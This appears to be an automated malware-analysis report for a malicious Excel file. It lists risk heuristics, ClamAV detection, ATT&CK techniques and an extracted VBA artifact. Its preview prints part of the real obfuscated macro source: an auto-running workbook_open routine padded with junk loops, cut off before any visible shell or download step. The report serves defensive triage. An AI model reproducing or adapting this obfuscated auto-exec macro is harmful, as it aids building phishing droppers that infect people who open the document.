MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1047 WMI
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes a Shell() call and CreateObject, indicating it is designed to execute arbitrary code. The presence of a 'macros.bas' file and the 'OLE_VBA_SHELL' heuristic strongly suggest the macro's purpose is to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Agent-6923047-0' further supports its malicious nature.
Heuristics 7
-
ClamAV: Doc.Trojan.Agent-6923047-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-6923047-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16340 bytes |
SHA-256: fcc5d7c80d0cd152894f59e6b1effaf5e514e58424ac1140c9acc452c69c6665 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
AF1AcXeqVm.wCIXtRaOcpx3i_meaczh
While 25 = 4321
Dim VEZc1Ut2Ps_1hrFyl8xtKTGNrU5O7kRGoeZqkogWhi8sk6T13x As Variant
Wend
Dim cn_UA7JudZd4 As Integer
While 6 = 9961
Dim oY6KCPXL7ZZKlUXmu_CUGqyciHXtY3B7CnQSntQ As Variant
Wend
Dim jck6CM2sohg As Integer
While 20 = 8289
Dim dVGu8jak31nvCWbH7C_8Arb2fuuNqXsK As Variant
Wend
Dim gi43SrLHWryx3 As Integer
While 23 = 7957
Dim ntrvlch9u3ONKxL3cGb4Hz3MDrUu1StCr2Ec8lFqR4uonmG39N As Variant
Wend
Dim jU3sx1dq3FwFZHL As Integer
While 9 = 8081
Dim eSqr41_tkNDLiYjaulYHpxGPkc4LjdvTfaGwJOSBikQ As Variant
Wend
Dim ctn4QRoAd_ As Integer
While 21 = 513
Dim eqJYFY6wIEaroGQwOdQWi_enf7ik45bQSf6YkuH3_vZ As Variant
Wend
Dim KBA9v_dXfLlY As Integer
While 22 = 6283
Dim YJf3IzS2NlIXGK1JdUWQvmSkd7vkXe6_pFeN_19Ct4Kh1lzjGS4IxSlu14 As Variant
Wend
Dim XKDrbroDqAo As Integer
While 22 = 6481
Dim lEmUTg2Ztt2FJb_kuOVcsVIbw8BZb3w4x4eMPxcvtTEIeD2N As Variant
Wend
Dim WF3xTg6N5IgU As Integer
While 28 = 900
Dim eZ7168QP7zS7vjsXP_6rEvCU98iP8OREOGPRVMLguk As Variant
Wend
Dim Pfv6Bswf85MyN As Integer
While 26 = 922
Dim rWk27WAQqgMpmSYBBvX6deehC6ybZQ As Variant
Wend
Dim V1Z2g5tUNH As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AF1AcXeqVm"
Dim unKSlBRVkVwhWCCbOt544_24M8bvCv1nACrGNCzxyy7CDKhc3QoQyKDpvP_mifRxdGgSS5ML4FD_FxzBX82uFixx9BU77KMReHg5nNH8CbW As String
Function tRi9hNWYWd5Gy2tL1CxAhgzYIUNuucPpf(Mn6aQsNrt4qNeyCwBiMQc6hW87fNYk98ywyHknndL_hbiRVNpNdhA1bQEhcSL9RH5sXq_4KW4r_bV_xnjQhIEY68SfCCJTQMqYgz3nMvCFnQv94_sxs5YGBdvZWbzHKhY1u6g7u6CuF)
While 16 = 418
Dim JwRZPU_hPvwjc1ca6W6WnL2JxEtAEj As Variant
Wend
Dim B3ggP3oEfJmbW As Integer
While 2 = 2226
Dim DQjHHzoiFZI75GkIjDao2uq6SLgPQXK_tcEfek1O5T4aViUuC66 As Variant
Wend
Dim FJweRiny6QXPq As Integer
While 21 = 3674
Dim NILZA_n9KKtgzNht1uMUbDx68w6zu57e As Variant
Wend
Dim CLLLU4t7Q6 As Integer
Dim gzuDqSMfWqULgi_8MB9TZ585QvWR87ePF62DtxyJJaQgMlDaGcU3S9jl2zv555gYKD_jq5MXKwH8lYpnq5Idkl7GUNK3A4NO32UHfbtLO6pezk_bHFL_tCxhE7NasSVQg2_tCgGNI7
While 7 = 7839
Dim B8bT___eJ5NITObLHwMPNMcmBUW6AODfHy4_Tktp As Variant
Wend
Dim zZTF8C1_afwcqmt As Integer
While 24 = 6502
Dim xcyQsqGd41qAeUb2gBgZw3Vo8cQddbixdD_eeRA8q6YOOAUs9mNZI As Variant
Wend
Dim L75FIRNXm_aQ2e As Integer
While 2 = 2941
Dim ZO6VNAhrzbFX7GgezLGnPFIXU9uiD68 As Variant
Wend
Dim Vd4bBP_Ykc As Integer
Dim mNF8jZgdFC_7pewDaH_QKEsp95I7ne_6dFidtYjMeFWYaagajZ7Z5f2geY9oOjykBHbi5RSA
While 25 = 7535
Dim Ea_tUF1FHNHMNR_gAOO9m3cHAaM_bhK As Variant
Wend
Dim rBv_rXjlnr6vsx As Integer
While 17 = 366
Dim HOjWdOtHlzL7zr42umjBZJaRVGYlkPqEtT2Jlp8RahY6wtg1 As Variant
Wend
Dim qu6QKpV7xQ_Uy As Integer
While 18 = 3930
Dim FgUGELezsO_oPi1uddkjg4zTX4D74UTokbTADwqgAA8 As Variant
Wend
Dim dzl4EeKRvW As Integer
While 6 = 3426
Dim tQKp_sJGh6V5XCxNyppwDif6Tcu_7ZrBgQ1JGTCC As Variant
Wend
Dim eXaDkiah_1pd As Integer
While 25 = 1942
Dim l9SJtOUf
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.